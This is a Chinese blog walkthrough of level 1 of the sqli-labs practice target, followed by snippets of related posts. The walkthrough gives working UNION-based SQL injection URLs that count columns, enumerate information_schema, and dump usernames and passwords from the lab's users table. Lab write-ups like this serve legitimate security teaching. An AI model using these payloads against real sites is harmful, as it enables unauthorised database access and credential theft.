Sqli-labs第一题详解

最新推荐文章于 2024-06-07 07:48:16 发布
最新推荐文章于 2024-06-07 07:48:16 发布
阅读量1.9k 收藏 7
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43531669/article/details/90812561
版权

less1:
根据题目提示为单引号注入,先测试一下
在这里插入图片描述
果然报错了,说明我们添加的单引号被数据库成功解析,那我们就可以通过闭合id这个参数 ,然后构造自己的sql语句进行攻击。一般可以使用联合表的方式来提取自己想要的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。
那么知道这个我们就开始查字段吧
确定字段数一般可以使用order by 语句:
http://localhost/sqlilabs/Less-1/?id=1 order by 1 %23
执行成功
http://localhost/sqlilabs/Less-1/?id=1' order by 2 %23
执行成功
http://localhost/sqlilabs/Less-1/?id=1' order by 3 %23
执行成功
http://localhost/sqlilabs/Less-1/?id=1' order by 4 %23
报错:
在这里插入图片描述
//注意这里使用 # 是不行的,游览器没有帮我们编码,所以我们自己编
%23#的url编码,--+可以直接使用//

即只有三个字段,那么现在开始联合查询:
因为sql语句的执行结果只有第一行会被回显在页面上,所以我们要把原始语句的的结果 集变为空,这样我们想要的结果才能显示在界面上
同时又需要确定哪几个字段会被显示在页面上:
在这里插入图片描述
可以看出2,3字段被显示出来,
接着爆数据库在这里插入图片描述
看到数据库名为:security,接着再查其他信息
http://localhost/sqli-labs/Less-1/ ?id='union select 1,2,concat_ws((char(32,58,32)),user(),database(),version())--+在这里插入图片描述
这里我使用了concat_ws() 函数:
concat_ws(separator,str1,str2,…)
第一个参数是其它参数的分隔符。分隔符的位置放在要连 接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。
es:
select concat_ws(’,’ , ‘11’ , ‘22’ , ‘33’);  11,22,33
group_concat(): 使多行数据在一列显示
char(32,58,32)对应ascill码为空格:空格
user():返回当前数据库连接使用的用户
database():返回当前数据库连接使用的数据库
version():返回当前数据库的版本

我们还要知道在Mysql中有information_schema这个库,该库存放了所有数据库的信息。

information_schema.columns包含所有表的字段
table_schema 数据库名
table_name 表名
column_name 列名
information_schema.tables包含所有库的表名
table_schema 数据库名
table_name 表名
information_schema.schemata包含所有数据库的名
schema_name 数据库名

OK 得到这些信息之后我们再来看看数据库有哪些表

http://localhost/sqli-labs/Less-1/
?id='union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

在这里插入图片描述
可以看到有四张表,我们想要的信息基本都在user表下
我们对这张表爆列名:
http://localhost/sqli-labs/Less-1/ ?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
在这里插入图片描述
接着进行爆用户信息

http://localhost/sqli-labs/Less-1/ ?id=' union select 1,group_concat(username),group_concat(password) from users --+在这里插入图片描述
OKヾ(≧▽≦*)o 第一关到此结束。

未完成的歌~
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
sqli-labs第一关
weixin_69147946的博客
11-11 457
sqli-labs靶机笔记
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs学习第一
Recar的博客
12-06 1776
很多东西了解一下,然后去用,总会遇到问,一定不能浅尝辄止,要深入学习下,不能说说,要及时复习,要经常用才不会忘。 一直用 sqlmap,很少手工注入,但是很多时候不是别人写的工具就能解决的,要自己的工具适应不同的场景,编写自己的工具,那么首先要手工流程很熟悉才可以。 决定实践一遍 sqli-lab,还有各大平台的CTF都来一遍。 实践是检验真理的唯一标准http://localhost:90
sqli-labs详解
gankjk的博客
10-19 6586
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 首先输入参数?id=1,这时页面正常显示,并不报错。 这时我们输入?id=1‘时出现报错,可以判断它是单引号注入 常规注入,判断字段数,当我们order by10时,发生错误,然后我们用二分法判断有几个字段(向上取整)。 当我们到order by 3 时没有报错,这时候我们试试order by 4,发现报错,说明只有三个字段。 然后我们看回显...
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
dzqxwzoe的博客
06-07 946
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
sqli-labs详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
Sqli-labs-master第一关通关攻略
ytdd66的博客
01-28 582
id=1' AND 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+ 查询security内的所有表名。id=1' and 1=2 union select 1,2,3 --+ and1=2始终为假的条件,旨在阻止原始查询的结果返回。输入双引号则正常,这里就可以判断存在注入漏洞,注入点为 id=1‘
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
jeakinscheung-sqli-labs-php7-master.zip
03-16
"jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
Sqli-Labs是一个专门针对SQL注入进行实战训练的靶场,分为多个级别,每个级别设计了不同的漏洞场景,旨在帮助用户理解和掌握SQL注入的检测和防护方法。“sqli-labs-master.zip”文件则包含了这个靶场的源代码和相关...
SQLi-LABS(1~10关详解
CTF小白的博客
09-22 6444
目录SQLi-LABS Less-1查看目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看目环境测试...
sqli-labs-master 闯关第一关,单引号 ' 字符型注入
qq_39030256的博客
11-18 2669
sqli-labs-master第一关 注:%23为#的url编码 第一关比较简单,在最上面的url后面手动输入http://localhost/sql/sqli-labs-master/Less-1/?id=1可以直接看到用户名密码,同样http://localhost/sql/sqli-labs-master/Less-1/?id=2可以看到另一个用户名密码,以此类推。但是呢,我们要用手动...
sqlilabs教程(1-10)
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问,也就是说我们添加的单引号成功被...
sqli-libs攻略入门(1-4)
shijianyoulei6的博客
06-30 2695
从根本上讲,当开发人员对用户的输入过滤不严,造成了用户可以通过输入SQL语句控制数据库,就会产生SQL注入漏洞。 为了省时间,快速的学习了解SQL注入,这里使用Windows sever 2008 R2+phpstudy环境 首先需要在源代码中添加这两个语句,使网页能够回显执行的有效sql语句 echo”有效输入”.$id.”<br>” echo”执行的sql语句”.$sql...
Sqli-labs通关总结
→_→
06-27 1971
历经两个多月,总于通关了,后面还有10关由于原作者并没有没有更新,我们也就无从下手,不过从这65关中我们足以对SQL注入有了一个清晰的了解了,也就勉强达到SQL注入入门的水平,接下来就是去各大平台去找SQL类型的目去做。 在通关的过程中参考了别人写的博客,因为是初学者,参考了大量的博客,参考的过程中即能提升自己的技能,也能学习别人的思路,还能总结他们的做法,通关的方法有很多,我都一一做了记录,当然还要说一点的是,别人的博客多多少少都会有点错误,这需要我们自己去发现,记住,一定要自己...
sqli-labs大法21~28a
weixin_43733035的博客
01-23 597
Less-21: 第21关,根据前面18关之后的经验,我决定先登录一下试试,然后… 瞬间爆炸了有木有,一堆英文完全看不懂啥意思,不过幸好有百度翻译, emmmm,好像没什么用,该没看懂还是没看懂,不过看到有user-agent和http,就决定先用' and union select 1,2,3#试一下,发现语句会直接输出,并没有注入。 然而,当我在cookie之中写payload时页面出现了...
Sqli-labs 1-65关的解记录(做思路与简要)
CaesarQu的博客
08-13 3627
Sqli-labs的详细解记录 Less-1: 进入关卡内先判断是否存在注入情况,先输入?id =1 and 1=1,发现没有变化,换成and 1=2,依旧没有变化,考虑是为字符型而非整形。用 ’ 进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入。 发现为字符型的后先在后面加一个注释符 --+ 可以发现正常返回数据。 此处可以用 order by 对前面的数据进行排列,先进行试数,发现只有三组数据,'order by 4–+就会超出 然后就可以进行union联合注入 然后就可以获取所有
SQL注入实验——web靶机第五关(报错回显)
qq_41554179的博客
03-09 557
报错回显:输入报错的函数,在报错函数里面写语句回显正确的东西 测试交互方法(此靶机为get) 判断字符类型(此靶机为字符型) 构造闭合; 用报错函数爆库名; http://192.168.96.133/sqli-labs-master/Less-5/?id=1' AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(...
sqli-labs第一
09-03
1. 打开sqli-labs网站并导航到第一。 2. 研究页面上的表单或URL参数,找到可以进行注入的输入点。 3. 尝试输入一些常见的注入语句,如' or 1=1 -- 或 ' or '1'='1' -- ,并观察系统的响应。 4. 如果系统返回了预期...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值